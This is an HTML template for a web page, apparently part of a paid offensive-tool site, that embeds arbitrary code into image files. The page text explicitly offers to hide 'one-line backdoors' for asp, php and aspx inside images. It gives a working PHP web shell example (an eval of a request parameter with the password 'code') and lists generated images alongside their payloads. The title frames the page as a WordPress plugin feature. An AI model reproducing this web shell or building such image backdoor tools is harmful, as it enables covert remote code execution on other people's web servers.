<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>代码植入图片系统_wordpress博客插件功能页</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="{$url.themePath}/css/bootstrap.min.css">
<link rel="stylesheet" href="{$url.themePath}/css/bootstrap-theme.min.css">
<link rel="stylesheet" href="{$url.themePath}/css/css.css">
<script src="//code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="{$url.themePath}/js/bootstrap.min.js"></script>
</head>
<body>
{include file="header.html"}
<div class="container">
{include file="menus.html"}

<div class="col-sm-9">
    <div class="panel panel-default">
    <div class="panel-heading">代码植入图片内系统</div>   
    <br>
    <form action="{$url.root}/bdstatic.com/?callback=user&act=piccodeimplantation" method="post" id="formSeting">
            <div class="form-group">
                <label for="key" class="col-sm-3 control-label">关键字：</label>
                <div class="col-sm-4">
                    <input type="text" name="key" value="" class="form-control" id="key" placeholder="这里放入你需要植入的代码。">
                </div>
            </div>
            <div class="form-group">
                <!-- <label for="" class="col-sm-3 control-label"></label> -->
                    <button type="submit" value="提交" class="btn btn-info">点击植入</button>
                    <!-- <button type="button" id="save" class="btn btn-primary">保存</button> -->
            </div>
			<p style="text-align: center;color: #f90000;">这里可以把你需要的任何代码植入图片中。（各类一句话后门等，例如asp、php、aspx等等）</p>
			<p style="text-align: center;">示例把php一句话植入图片中。则在上方输入：&lt;?php @eval($_REQUEST[&quot;code&quot;])?&gt;  示例中的一句话密码为code</p>
			<p style="text-align: center;">本功能的意义可参考：http://www.freebuf.com/articles/web/54086.html 或者 https://woj.app/3377.html 。。。本功能主要是不破坏图片的形式，在其中植入你需要的代码(不可以过分的长)。此功能仅供“赞助会员”使用，且每月仅有5次使用权力。</p>
    </form><br/>
	
	<table class="table" border="0" cellspacing="0" cellpadding="0">
		<thead>
			<tr>
				<th width="200">图片(可右键保存本地)</th>
				<th width="200">包含的payload</th>
			</tr>
		</thead>
		<tbody>
			{foreach from=$contents item=v}
			<tr>
				<td><img src='../{$v.picpath}' style='width:150px;height:100px;' title='可右键保存此文件到本地'></td>
				<td>{$v.code}</td>
			</tr>
			{/foreach}
		</tbody>
	</table>
	<div class="meneame">
			{$pagers}<a >共{$pages}页</a>
		</div>
    </div>

</div>
</div>

{include file="footer.html"}
</body>
</html>